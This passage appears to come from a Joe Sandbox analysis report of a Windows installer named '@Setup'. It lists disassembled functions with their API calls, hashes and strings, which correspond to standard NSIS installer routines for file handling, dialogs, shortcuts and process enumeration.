                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                    Strings
                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                    • String ID: F$A
                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                    Strings
                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                    APIs
                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                    • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                    • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
